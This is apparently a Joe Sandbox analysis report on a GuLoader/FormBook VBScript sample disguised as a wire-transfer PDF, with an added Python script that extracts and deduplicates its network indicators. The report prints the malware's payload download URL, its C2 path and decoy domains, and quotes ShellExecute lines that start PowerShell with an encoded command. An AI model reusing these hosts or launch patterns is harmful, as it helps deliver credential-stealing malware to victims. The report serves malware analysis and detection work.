Windows Analysis Report
Wire-84844663637346665.PDF.vbs

Overview

General Information

Sample Name: Wire-84844663637346665.PDF.vbs
Analysis ID: 557834
MD5: 2eb1625e8d4e3f9b19ab947d188d0be8
SHA1: 7aad4e8d8f521d1c36a7468418047c8a5751b7e9
SHA256: 354529cf4cd5498c64a0c69c6dd9eb8962250542eea7f89a76faf64f5086da35
Tags: GuLoader vbs

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Potential evasive VBS script found (sleep loop)
Maps a DLL or memory area into another process
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses an obfuscated file name to hide its real file extension (double extension)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: 00000018.00000000.651802861.0000000002C00000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://research.the-miyanichi.co.jp/wp-^"}
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.recountsol.xyz/ty13/"], "decoy": ["renatocarrion.com", "inadmaa.email", "dgsgamer.com", "scentsofhome.com", "vimeghbrandshop.online", "seaxneat.com", "10448se147thave.com", "msewy.xyz", "greekgolden.com", "thinktosolve.com", "darmadao.com", "patriotproperties.info", "erwsed.tech", "iamanocelot.com", "marketinginspiration4.biz", "googleprog.com", "nz34.com", "xu6cotckdwbd.xyz", "jimmychenchen.com", "kntfashionstore.online", "ogusourcing.com", "digitalgraz.com", "nomiehalth.com", "neatoboutique.com", "luziaeeveraldo.com", "kootenaysewersolutions.com", "powerplantsliverpool.com", "allinclusiveplaya.com", "jldphotograph.com", "threedaydeli.com", "sv7wgmna.xyz", "reformasmod.com", "autoconnect.support", "hustle1radio.com", "thepremiersales.com", "transform.guide", "awolin.link", "sala1.xyz", "xn--er-7ka.com", "leadthisway.com", "bluegrownmx.com", "tablewaro.com", "ecoprimex.com", "gloress.com", "khodabavar.com", "verhuisdoos.net", "accessftlauderdale.com", "gorgeousincome.com", "jxs6652.com", "bioheallabs.com", "pdswakl.com", "douglasacessorios.com", "coincapmjd.xyz", "liningning.xyz", "buyoutz.site", "agvtime.com", "homeit99.com", "caveatcooperative.com", "honeyboxsoap.com", "snoringdisorders.com", "dianziyanpeijian.com", "pcc.life", "lookbypc.com", "osldjz.com"]}
Source: Wire-84844663637346665.PDF.vbs ReversingLabs: Detection: 11%
Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 133.242.141.149:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: Binary string: ieinstal.pdbGCTL source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: ieinstal.pdb source: explorer.exe, 00000021.00000000.897631376.000000000834F000.00000004.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000018.00000002.782255727.000000001EAF0000.00000040.00000001.sdmp, ieinstal.exe, 00000018.00000002.782669035.000000001EC0F000.00000040.00000001.sdmp
Source: Binary string: help.pdbGCTL source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp
Source: Binary string: help.pdb source: ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000002.777312108.00000000028D0000.00000040.00020000.sdmp

Networking

Source: Initial file: BinaryStream.SaveToFile Svageli, 2
Source: Malware configuration extractor URLs: www.recountsol.xyz/ty13/
Source: Malware configuration extractor URLs: https://research.the-miyanichi.co.jp/wp-^
Source: Joe Sandbox View ASN Name: SAKURA-ASAKURAInternetIncJP SAKURA-ASAKURAInternetIncJP
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/bin_GuOImF134.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: research.the-miyanichi.co.jp Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: smartscreen.exe, 00000025.00000002.887372203.0000026134F28000.00000004.00000020.sdmp String found in binary or memory: http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600
Source: powershell.exe, 00000011.00000002.715234826.000000000077C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000003.695279329.000000000309C000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000002.778101079.000000000309C000.00000004.00000020.sdmp, ieinstal.exe, 00000018.00000003.694948710.000000000309C000.00000004.00000001.sdmp, ieinstal.exe, 00000018.00000003.695511033.000000000309C000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: smartscreen.exe, 00000025.00000002.887372203.0000026134F28000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.718141346.00000000049A1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000019.00000000.715778116.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.698139484.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.738782106.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/P
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.bin
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.bin5
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.binT
Source: unknown DNS traffic detected: queries for: research.the-miyanichi.co.jp
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/bin_GuOImF134.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: research.the-miyanichi.co.jp Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 133.242.141.149:443 -> 192.168.2.6:49841 version: TLS 1.2
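Two caveats apply when turning the Networking lines above into indicators. First, the three bin_GuOImF134.bin variants (…bin, …bin5, …binT) and the lone "/P" are one string read past its terminator in ieinstal.exe memory, not four distinct URLs. Second, the contoso.com, nuget.org and Pester URLs found in powershell.exe memory are strings from PowerShell's bundled modules and appear in nearly every powershell.exe dump; they say nothing about this sample. The Python below is an added example, not part of the Joe Sandbox report: it parses a handful of the report lines reproduced above, drops runtime noise and collapses the garbage-trailed and truncated variants into a deduplicated IOC set. The noise-domain allowlist is an assumption to be tuned locally.

```python
import re
from urllib.parse import urlparse

# Report lines copied from the Networking section above (a representative subset).
REPORT_LINES = """\
Source: Malware configuration extractor URLs: www.recountsol.xyz/ty13/
Source: Malware configuration extractor URLs: https://research.the-miyanichi.co.jp/wp-^
Source: smartscreen.exe, 00000025.00000002.887372203.0000026134F28000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.718935785.0000000004AE7000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.722919182.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/P
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.bin
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.bin5
Source: ieinstal.exe, 00000018.00000002.777872681.000000000303E000.00000004.00000020.sdmp String found in binary or memory: https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.binT
Source: unknown DNS traffic detected: queries for: research.the-miyanichi.co.jp
"""

# Markers after which a report line carries an indicator value.
MARKERS = ("String found in binary or memory: ",
           "Malware configuration extractor URLs: ",
           "queries for: ")

# Assumption: starter allowlist of domains that show up in almost any powershell.exe /
# smartscreen.exe memory dump (module manifests, test-framework strings, cert-chain
# endpoints). They are runtime artefacts, not indicators of this sample; tune per site.
NOISE_DOMAINS = ("contoso.com", "nuget.org", "pesterbdd.com", "github.com", "apache.org",
                 "schemas.xmlsoap.org", "msocsp.com", "globalsign.net", "ucsuri.tcs",
                 "autoitscript.com")


def indicators(text):
    """Pull the indicator field out of every report line that carries one."""
    found = []
    for line in text.splitlines():
        for marker in MARKERS:
            if marker in line:
                value = line.split(marker, 1)[1].strip()
                # strip trailing non-URL characters such as the extractor's "^"
                found.append(re.sub(r"[^\w./:%?=&~-]+$", "", value))
                break
    return found


def host_of(indicator):
    return urlparse(indicator if "://" in indicator else "http://" + indicator).hostname or ""


def is_noise(indicator):
    host = host_of(indicator)
    return any(re.search(r"(^|\.)" + re.escape(d), host) for d in NOISE_DOMAINS)


def normalize_urls(urls):
    urls = set(urls)
    # pass 1: a URL that only extends another observed URL by 1-2 characters is the same
    # string read past its terminator in memory ("...bin5", "...binT", "/P"); drop it
    firm = {u for u in urls
            if not any(v != u and u.startswith(v) and len(u) - len(v) <= 2 for v in urls)}
    # pass 2: a URL that stops mid-token and is a strict prefix of a surviving URL is a
    # truncated read of it (the extractor's ".../wp-"); drop it too
    return {u for u in firm
            if u.endswith("/") or not any(v != u and v.startswith(u) for v in firm)}


def extract_iocs(text):
    inds = indicators(text)
    kept = [i for i in inds if not is_noise(i)]
    bare = {i for i in kept if "/" not in i}          # DNS-only indicators
    urls = normalize_urls(i for i in kept if "/" in i)
    hosts = {host_of(u) for u in urls} | bare
    return {"urls": sorted(urls), "hosts": sorted(hosts),
            "noise_dropped": len(inds) - len(kept)}


if __name__ == "__main__":
    result = extract_iocs(REPORT_LINES)
    for key in ("urls", "hosts"):
        print(key)
        for item in result[key]:
            print("  ", item)
    print("noise lines dropped:", result["noise_dropped"])
```

The output for the embedded lines is the FormBook C2 path, the GuLoader payload URL and its host root, plus the two hostnames; the host root is kept because a URL ending in "/" is a complete indicator in its own right. Paste the full Networking section in place of the embedded lines to process a whole report.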

E-Banking Fraud

Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\help.exe Dropped file: C:\Users\user\AppData\Roaming\N6AQ8R9T\N6Alogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\help.exe Dropped file: C:\Users\user\AppData\Roaming\N6AQ8R9T\N6Alogrv.ini Jump to dropped file
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7121
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7121 Jump to behavior
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07897E00 17_2_07897E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07897E00 17_2_07897E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07CF3130 17_2_07CF3130
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_07CF0040 17_2_07CF0040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE22AE 24_2_1EBE22AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE2EF7 24_2_1EBE2EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB36E30 24_2_1EB36E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB4EBB0 24_2_1EB4EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE1FF1 24_2_1EBE1FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB420A0 24_2_1EB420A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE20A8 24_2_1EBE20A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2B090 24_2_1EB2B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2841F 24_2_1EB2841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBD1002 24_2_1EBD1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB42581 24_2_1EB42581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB2D5E0 24_2_1EB2D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB10D20 24_2_1EB10D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB34120 24_2_1EB34120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB1F900 24_2_1EB1F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE2D07 24_2_1EBE2D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EBE1D55 24_2_1EBE1D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1EB1B150 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB596E0 NtFreeVirtualMemory,LdrInitializeThunk, 24_2_1EB596E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A20 NtResumeThread,LdrInitializeThunk, 24_2_1EB59A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A00 NtProtectVirtualMemory,LdrInitializeThunk, 24_2_1EB59A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59660 NtAllocateVirtualMemory,LdrInitializeThunk, 24_2_1EB59660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A50 NtCreateFile,LdrInitializeThunk, 24_2_1EB59A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB597A0 NtUnmapViewOfSection,LdrInitializeThunk, 24_2_1EB597A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59780 NtMapViewOfSection,LdrInitializeThunk, 24_2_1EB59780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59710 NtQueryInformationToken,LdrInitializeThunk, 24_2_1EB59710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB598F0 NtReadVirtualMemory,LdrInitializeThunk, 24_2_1EB598F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59860 NtQuerySystemInformation,LdrInitializeThunk, 24_2_1EB59860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59840 NtDelayExecution,LdrInitializeThunk, 24_2_1EB59840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB599A0 NtCreateSection,LdrInitializeThunk, 24_2_1EB599A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 24_2_1EB59910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59540 NtReadFile,LdrInitializeThunk, 24_2_1EB59540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A80 NtOpenDirectoryObject, 24_2_1EB59A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB596D0 NtCreateKey, 24_2_1EB596D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59610 NtEnumerateValueKey, 24_2_1EB59610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59A10 NtQuerySection, 24_2_1EB59A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59670 NtQueryInformationProcess, 24_2_1EB59670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59650 NtQueryValueKey, 24_2_1EB59650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5A3B0 NtGetContextThread, 24_2_1EB5A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59FE0 NtCreateMutant, 24_2_1EB59FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59730 NtQueryVirtualMemory, 24_2_1EB59730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5A710 NtOpenProcessToken, 24_2_1EB5A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59B00 NtSetValueKey, 24_2_1EB59B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59770 NtSetInformationFile, 24_2_1EB59770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5A770 NtOpenThread, 24_2_1EB5A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59760 NtOpenProcess, 24_2_1EB59760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB598A0 NtWriteVirtualMemory, 24_2_1EB598A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59820 NtEnumerateKey, 24_2_1EB59820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5B040 NtSuspendThread, 24_2_1EB5B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB595F0 NtQueryInformationFile, 24_2_1EB595F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB599D0 NtCreateProcessEx, 24_2_1EB599D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB595D0 NtClose, 24_2_1EB595D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB5AD30 NtSetContextThread, 24_2_1EB5AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59520 NtWaitForSingleObject, 24_2_1EB59520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59560 NtWriteFile, 24_2_1EB59560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 24_2_1EB59950 NtQueueApcThread, 24_2_1EB59950
Source: Wire-84844663637346665.PDF.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\explorer.exe Section loaded: usermgrproxy.dll Jump to behavior
Source: Wire-84844663637346665.PDF.vbs ReversingLabs: Detection: 11%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Wire-84844663637346665.PDF.vbs"
